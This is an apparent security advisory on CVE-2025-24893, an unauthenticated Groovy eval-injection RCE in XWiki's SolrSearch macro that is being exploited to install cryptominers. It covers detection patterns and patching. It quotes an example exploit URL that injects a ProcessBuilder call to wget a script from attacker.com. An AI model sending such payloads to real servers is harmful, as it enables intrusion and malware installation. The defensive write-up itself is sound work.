The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in the XWiki enterprise wiki platform, tracked as CVE-2025-24893, to its Known Exploited Vulnerabilities (KEV) catalog. This action follows confirmation of active, in-the-wild exploitation. The flaw is an unauthenticated remote code execution (RCE) vulnerability with a CVSS score of 9.8, allowing attackers to take complete control of vulnerable servers. Observed attacks are leveraging this access to deploy cryptocurrency mining malware. CISA has directed Federal Civilian Executive Branch (FCEB) agencies to apply mitigations, and all organizations using affected XWiki versions are urged to patch immediately.
The vulnerability, CVE-2025-24893, is a severe eval injection flaw. It exists in how the SolrSearch macro in XWiki processes search queries. The macro fails to properly sanitize user-supplied input containing Groovy expressions. An unauthenticated attacker can craft a simple GET request with a malicious search query containing Groovy code. When the XWiki server processes this query, it executes the embedded code with the full permissions of the XWiki application's user account.
An example of a malicious query might look like this:
/xwiki/bin/view/Main/SolrSearch?q=~"{{groovy}}new%20ProcessBuilder(\"wget\",\"http://attacker.com/payload.sh\").start(){{/groovy}}"~&sort=score&sort_order=desc
This simplicity and lack of an authentication requirement make any internet-facing, unpatched XWiki instance an easy target.
The vulnerability affects the following versions of the XWiki Platform:
15.10.1116.4.116.5.0RC1CVE-2025-24893 is being actively exploited in the wild. Researchers at VulnCheck reported observing multiple exploitation attempts against their XWiki honeypot servers. The attacks were traced back to an IP address geolocated in Vietnam. The observed attack chain involves using the RCE to execute a wget command, which downloads a second-stage script. This script then fetches and executes a cryptocurrency mining payload. The addition of this CVE to the CISA KEV catalog on October 30, 2025, confirms the widespread and active threat.
Successful exploitation of CVE-2025-24893 results in unauthenticated remote code execution, giving an attacker complete control over the underlying server. While current attacks focus on cryptomining (T1496 - Resource Hijacking), the level of access gained could easily be used for more destructive purposes, including:
Security teams can hunt for exploitation attempts by searching for suspicious patterns in web server access logs.
/bin/view/Main/SolrSearch where the q parameter contains strings like {{groovy}}, ProcessBuilder, execute(), or other Groovy syntax.wget, curl, sh, or bash.D3-NTA: Network Traffic Analysis on web logs.D3-PA: Process Analysis.Immediate patching is the most effective remediation.
15.10.11 or later16.4.1 or later16.5.0 or laterxwiki.properties file and set search.solr.rawQuery to false. This will disable the feature that allows raw query processing but may impact search functionality.D3-NI: Network Isolation.The primary mitigation is to update the XWiki platform to a patched version that corrects the eval injection flaw.
Use a Web Application Firewall (WAF) to inspect incoming traffic and block requests containing malicious Groovy code patterns.
As a temporary workaround, disable the raw query feature in the XWiki configuration to prevent the vulnerable code path from being reached.
Restrict network access to the XWiki instance, ensuring it is not unnecessarily exposed to the public internet.

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Help others stay informed about cybersecurity threats